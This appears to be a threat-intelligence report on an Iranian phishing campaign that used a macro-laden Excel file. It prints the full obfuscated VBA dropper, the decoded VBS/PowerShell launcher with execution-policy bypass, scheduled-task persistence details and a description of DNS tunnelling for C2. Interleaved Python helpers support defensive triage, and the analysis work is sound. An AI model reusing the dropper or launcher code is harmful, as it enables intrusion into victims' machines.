This is an Internal Document and should not be shared with unauthorized users.
Iranian Malware analysis report
Iranian malware Targeting Aerospace and Telecom in 2017
Author: Ahmed El-fanagely
Linkedin: https://www.linkedin.com/in/ahmed-pentest/
VERSION 1.0
ANNUAL REPORT | 2018 3
1 TABLE OF CONTENTS
2 Executive Summary ............................ 4
3 ToolSet ...................................... 4
4 MITRE ATT&CK ................................. 4
5 VBA MACRO ANALYSIS ........................... 5
6 POWERSHELL MALWARE DEEP DIVE ................ 10

2 EXECUTIVE SUMMARY
In this attack, spear phishing was used as the initial infection vector. Before launching the attack,
the group studied publicly available information about the targeted organization and identified
email addresses belonging to various departments of the company.
Email addresses in these departments received phishing emails carrying a malicious Excel file.
The phishing emails claimed to contain an urgent HR survey, and were carefully crafted and written
on behalf of the human resources department.
Once the attacker had compromised one employee's email credentials, the attacker started sending
phishing emails to everyone in the same department with a malicious Excel file. These emails claimed
to contain an urgent payment to check in the attached file, and were carefully crafted and written
on behalf of the victim employee.
The attachment received by email is the IOC shown below:
File name             File format   MD5 hash value
TNA.March17.001.xls   XLS           2a462cdbaee3b0340bc6298057d83240
3 TOOLSET
• Notepad++
• SSView
• Olevba
4 MITRE ATT&CK
ID          Name
T1566.001   Phishing: Spearphishing Attachment
T1204.002   User Execution: Malicious File
T1546.013   Event Triggered Execution: PowerShell Profile
T1053.005   Scheduled Task/Job: Scheduled Task
T1059.005   Command and Scripting Interpreter: Visual Basic
T1071.004   Application Layer Protocol: DNS
VBA MACRO ANALYSIS
When a victim opens the malicious Microsoft Excel spreadsheet attached to the email, the workbook
shows a single visible sheet containing invoice data. As soon as the user clicks "Enable Content",
the first stage of the malware payload executes.
Figure 1 Malicious Excel spreadsheet
Let us use the popular oledump and olevba Python scripts to examine whether the XLS file
contains any VBA macros:
Figure 2 Malicious Excel spreadsheet
According to olevba, the Excel sheet contains VBA macros. In the VBA code we observed the
function below, which reads data from worksheet cells:
Private Sub Workbook_Open()
    Call F5615664
End Sub
Sub F5615664()
    On Error Resume Next
    A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"
    I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"
    Set U5777083 = CreateObject(A4660720)
    Set D6945409 = CreateObject(I6611623)
    W2151843 = U5777083.ExpandEnvironmentStrings("%temp%\U1848931.TMP")
    I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
    Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True)
    M9383463.WriteLine (I2622608)
    M9383463.Close
    U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
    K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
    V1380609 = K7517347 & U1808667
    U5777083.Run V1380609, 0
    ActiveWorkbook.Worksheets(2).Visible = True
    ActiveWorkbook.Worksheets(3).Visible = True
    ActiveWorkbook.Worksheets(2).Activate
    ActiveWorkbook.Worksheets(1).Visible = False
    ActiveWorkbook.Save
End Sub
We did not observe any data initially, so we pulled the extracted Workbook stream into a hex editor
using SSView, a Windows GUI structured storage viewer.
Figure 3 SSView
Reviewing the extracted Workbook stream further in the hex editor, we observed obfuscated data that
was not visible initially: a base64-encoded blob (an obfuscation technique).
Figure 3 Base64-encoded data
The de-obfuscated data (the PowerShell malware script) is shown below.
We then debugged the Sub F5615664 in the Visual Basic Editor, since it is the procedure invoked
from Workbook_Open. Evaluating the first two assignments in the code,
    A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"
    I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"
gives the de-obfuscated result:
    A4660720 = "wScript.Shell"
    I6611623 = "Scripting.FileSystemObject"
The following lines read data from worksheet cells:
    W2151843 = U5777083.ExpandEnvironmentStrings("%temp%\U1848931.TMP")
    I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
    Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True)
    M9383463.WriteLine (I2622608)
    M9383463.Close
These cells contain the hidden data shown in Figure 3. The data is base64-encoded, and the VBA
macro writes it to the file "%temp%\U1848931.TMP" with the code above.
The next block reads a second cell and executes its content:
    U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
    K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
    V1380609 = K7517347 & U1808667
    U5777083.Run V1380609, 0
The de-obfuscated result:
    U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
    K7517347 = "cmd.exe -exec bypass -Enc "
    V1380609 = K7517347 & U1808667
    U5777083.Run V1380609, 0
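The string splitting and the encoded command line seen above are generic patterns, so a small static triage helper is useful when many such documents come in. The Python below is an added example, not code from the report or from any tool it uses: it resolves `&`-concatenated string literals in a VBA listing, flags auto-exec entry points and suspicious strings, and decodes a PowerShell `-EncodedCommand`/`-Enc` argument (base64 of UTF-16LE text). The sample VBA is constructed from the macro fragments quoted above; the keyword lists are assumptions.

```python
import base64
import re

# Constructed sample: assignments copied from the macro quoted above (raw string,
# so the backslash in the temp path is kept literally).
SAMPLE_VBA = r'''
Private Sub Workbook_Open()
Call F5615664
End Sub
Sub F5615664()
On Error Resume Next
A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"
I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"
Set U5777083 = CreateObject(A4660720)
W2151843 = U5777083.ExpandEnvironmentStrings("%temp%\U1848931.TMP")
K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
U5777083.Run V1380609, 0
End Sub
'''

# A VBA string literal: text between double quotes, with "" as an escaped quote.
STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')
# An assignment whose right-hand side is only string literals joined with '&'.
CONCAT_ASSIGN = re.compile(
    r'^\s*(\w+)\s*=\s*((?:"(?:[^"]|"")*"\s*&\s*)+"(?:[^"]|"")*")\s*$', re.M)

# Entry points that run without user interaction, and strings worth flagging
# once the concatenations are resolved (both lists are assumptions).
AUTOEXEC = ("Workbook_Open", "Auto_Open", "Document_Open", "AutoOpen")
SUSPICIOUS = ("WScript.Shell", "Scripting.FileSystemObject", "-Enc", "bypass", "%temp%")


def join_concat(expr):
    """Join the string literals of a `"a" & "b" & "c"` expression."""
    return "".join(m.group(1).replace('""', '"') for m in STRING_LITERAL.finditer(expr))


def resolve_concats(vba):
    """Map each variable assigned from a pure concatenation to its joined value."""
    return {m.group(1): join_concat(m.group(2)) for m in CONCAT_ASSIGN.finditer(vba)}


def triage(vba):
    """Static triage: auto-exec entry points, resolved strings, suspicious indicators."""
    resolved = resolve_concats(vba)
    # Search the raw listing and the resolved strings together, case-insensitively.
    haystack = (vba + "\n" + "\n".join(resolved.values())).lower()
    return {
        "autoexec": [name for name in AUTOEXEC if name in vba],
        "resolved": resolved,
        "indicators": [s for s in SUSPICIOUS if s.lower() in haystack],
    }


def decode_encoded_command(b64):
    """PowerShell -EncodedCommand / -Enc carries base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    for var, value in report["resolved"].items():
        print(f"{var} = {value!r}")
    print("auto-exec:", report["autoexec"])
    print("indicators:", report["indicators"])
```

Run it on the text that olevba prints for a document; the resolved dictionary gives the de-obfuscated `wScript.Shell`, `Scripting.FileSystemObject` and `cmd.exe -exec bypass -Enc ` strings without stepping through the macro in the VBA editor.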
I am using the simple procedures below to dump the hidden cell data to text files:
Sub Print_p1_file()
    ' Dump the base64 blob from cell (37, 27) of the first sheet
    Dim strFile_Path As String
    strFile_Path = "C:\Users\User\Desktop\p1.txt"
    Open strFile_Path For Output As #1
    I2622638 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
    Write #1, I2622638
    Close #1
End Sub
Sub Print_p2_file()
    ' Dump the encoded command argument from cell (40, 27) of the first sheet
    Dim strFile_Path As String
    strFile_Path = "C:\Users\User\Desktop\p2.txt"
    Open strFile_Path For Output As #1
    U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
    Write #1, U1808667
    Close #1
End Sub
Result:
Now let us decode the dumped data and start the malware analysis.
5 POWERSHELL MALWARE DEEP DIVE
The malicious document creates a PowerShell file and a VBS file and then continues executing the
payload with the following command line.
• Dropped first-stage file (before the machine id is inserted): C:\Users\User\AppData\Local\Temp\U1848931.TMP
• Malware path: C:\Users\User\AppData\Local\Microsoft\Windows\mc.ps1
• VBS path: C:\Users\User\AppData\Local\Microsoft\Windows\L69742.vbs
• Command line (note that this string is executed through the VBS script):
powershell.exe -NoP -sta -NonI -exec bypass -file C:\Users\User\appdata\local\microsoft\Windows\mc.ps1
Figure 4: Infection procedure
As soon as the macro executes and launches PowerShell, the malware is dropped and proceeds
through a multistage deployment:
1: PowerShell loader: creates the machine id and decodes the malware file
2: VBS script: executes the malware
3: MC PowerShell malware: offers functionality to control infected victims.
Let us start analysing the PowerShell loader. As seen below, the first function is responsible for
creating the VBS script.
VBS data after decoding:
set wss = CreateObject("WScript.Shell")
str = "power" & "sh" & "ell" & ".e" & "xe -NoP -sta -NonI -e" & "xe" & "c byp" & "as" & "s -fi" & "le "
path = "#dpath#"
str = str + path + "mc.ps1"
wss.Run str, 0
The second function decodes the malware code, creates the machine id and inserts it into the
second stage, "mc.ps1".
The last function is responsible for creating a scheduled task named "GoogleServiceUpdate" that
executes the VBS script "L69742.vbs" every 2 minutes.
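Persistence through a scheduled task that runs a script host from a user-writable path on a short repeat interval is the hunting signal here. The Python below is an added example, not the report's code: it scores rows from a constructed CSV in the shape of `schtasks /query /fo csv /v` output (only a subset of the columns; the column names and the repeat-interval format are assumptions) and flags tasks that combine several indicators. The task and script names are the ones given above; the other rows are made-up benign tasks.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo csv /v` output.
# Column subset, column names and the "Repeat: Every" format are assumptions;
# the task and script names come from the report, the other rows are made up.
# Raw string so the Windows backslashes survive as written.
SAMPLE_CSV = r'''"TaskName","Task To Run","Schedule Type","Repeat: Every"
"\GoogleServiceUpdate","wscript.exe C:\Users\User\AppData\Local\Microsoft\Windows\L69742.vbs","One Time Only","0 Hour(s), 2 Minute(s)"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k -g","Weekly","Disabled"
"\OneDrive Standalone Update Task","%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","Daily","Disabled"
'''

SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta|powershell|cmd)(\.exe)?\b", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|programdata|public)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|ps1|bat|hta)\b", re.I)


def interval_minutes(repeat):
    """Parse 'H Hour(s), M Minute(s)'; None when the task does not repeat."""
    m = re.match(r"(\d+) Hour\(s\), (\d+) Minute\(s\)", repeat)
    return int(m.group(1)) * 60 + int(m.group(2)) if m else None


def score_task(row, max_minutes=5):
    """Return the reasons a task row looks like script-based persistence."""
    action = row["Task To Run"]
    reasons = []
    if SCRIPT_HOST.search(action):
        reasons.append("script host in action")
    if USER_WRITABLE.search(action):
        reasons.append("payload in user-writable path")
    if SCRIPT_EXT.search(action):
        reasons.append("script file as payload")
    mins = interval_minutes(row["Repeat: Every"])
    if mins is not None and mins <= max_minutes:
        reasons.append(f"repeats every {mins} min")
    return reasons


def hunt(csv_text, min_reasons=2):
    """Map task name -> reasons for every task with at least min_reasons hits."""
    findings = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = score_task(row)
        if len(reasons) >= min_reasons:
            findings[row["TaskName"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_CSV).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Requiring two independent indicators keeps legitimate updaters that live under the user profile (the OneDrive row) out of the result while the GoogleServiceUpdate task hits all four.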
Let us start analysing the PowerShell malware. MC.ps1 offers functionality to control infected
victims:
1: Create paths and folders
2: Read the HDD data
3: Download and implant additional tools and malware through DNS requests
4: DNS data exfiltration
As seen in the image below, the first lines are parameter values, including the script path,
download folder, upload folder, machine id, maximum host length and C2 server.
The function in the image below is responsible for terminating PowerShell if the number of
execution orders exceeds 4.
The function "base32data" below, which I highlighted, is responsible for encoding and decoding data
before and after communicating with the C2.
The next function is responsible for creating the "dn" (download) and "up" (upload) folders.
The function below is responsible for communicating with the C2 and downloading files through DNS
requests using the Windows "NSLookup.exe" binary.
Let us go deeper into this function. In the first step the script builds the DNS request: it
replaces "([string]$id)" with the machine id "40699", appends randomly generated data to the
request, and sends it to the C2.
If the C2 responds with OK, the script continues with the batch file download function; if the C2
responds with NO, the script continues to the upload file function, as shown in the image below.
The C2 keeps sending and receiving data through DNS requests until a request contains "EOFEOF",
which means the file transfer is complete.
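Because the channel is DNS, the defensive view of this protocol is the resolver or DNS server query log. The Python below is an added example, not code from the report or the malware: it builds a constructed query log in which one client sends base32-encoded chunks prefixed with the machine id 40699 (the qname layout is an assumption, not the malware's exact format), then groups queries by domain, reassembles the base32 labels, and reports whether the "EOFEOF" end-of-file marker described above was seen. The base32 chunking helper exists only to build the sample.

```python
import base64
import re
from collections import defaultdict

# Labels made only of the RFC 4648 base32 alphabet and long enough to be payload
# rather than a hostname (the length threshold is an assumption).
B32_LABEL = re.compile(r"^[A-Z2-7]{8,63}$")
EOF_MARKER = b"EOFEOF"   # transfer terminator described in the report


def b32_chunks(data, size=16):
    """Base32-encode data, drop padding, cut into fixed-size labels (sample builder only)."""
    enc = base64.b32encode(data).decode().rstrip("=")
    return [enc[i:i + size] for i in range(0, len(enc), size)]


# Constructed 30-byte payload so every chunk is a full 16-character label.
_PAYLOAD = b"host=WS01;user=alice;v=1" + EOF_MARKER


def _build_sample_log():
    """Constructed log lines in an assumed '<timestamp> <client> <qname>' format."""
    lines = [
        "2017-03-01T10:00:00 10.0.0.5 www.benign.example",
        "2017-03-01T10:00:01 10.0.0.5 cdn.benign.example",
    ]
    for i, chunk in enumerate(b32_chunks(_PAYLOAD)):
        # machine id first, then the data label, then the C2 domain (layout assumed)
        lines.append(f"2017-03-01T10:01:{i:02d} 10.0.0.5 40699.{chunk}.c2.test")
    lines.append("2017-03-01T10:02:00 10.0.0.5 mail.benign.example")
    return lines


SAMPLE_LOG = _build_sample_log()


def split_qname(qname):
    """Return (registered domain, base32-looking subdomain labels)."""
    labels = qname.rstrip(".").upper().split(".")
    apex = ".".join(labels[-2:]).lower()      # two-label apex; no public suffix list offline
    data = [label for label in labels[:-2] if B32_LABEL.match(label)]
    return apex, data


def analyse(lines, min_queries=3):
    """Group payload-looking queries per domain and try to reassemble the data."""
    per_domain = defaultdict(list)
    for line in lines:
        apex, data = split_qname(line.split()[-1])
        if data:
            per_domain[apex].append("".join(data))
    findings = {}
    for apex, chunks in per_domain.items():
        if len(chunks) < min_queries:
            continue
        joined = "".join(chunks)
        padded = joined + "=" * (-len(joined) % 8)   # restore the stripped padding
        try:
            decoded = base64.b32decode(padded)
        except ValueError:
            decoded = b""
        findings[apex] = {"queries": len(chunks),
                          "complete": EOF_MARKER in decoded,
                          "decoded": decoded}
    return findings


if __name__ == "__main__":
    for apex, info in analyse(SAMPLE_LOG).items():
        print(apex, info["queries"], "queries, EOF marker seen:", info["complete"])
        print("  ", info["decoded"])
```

On real logs the two-label apex heuristic and the label-length threshold will need tuning, but the structure is the same: a domain receiving many unique base32-only subdomains from one client is the signal, and a successful decode ending in the marker confirms the channel.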
Thank you
